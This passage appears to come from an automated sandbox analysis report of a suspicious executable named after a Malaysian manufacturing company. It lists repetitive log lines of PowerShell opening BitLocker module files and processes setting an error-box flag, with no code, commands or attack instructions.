                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
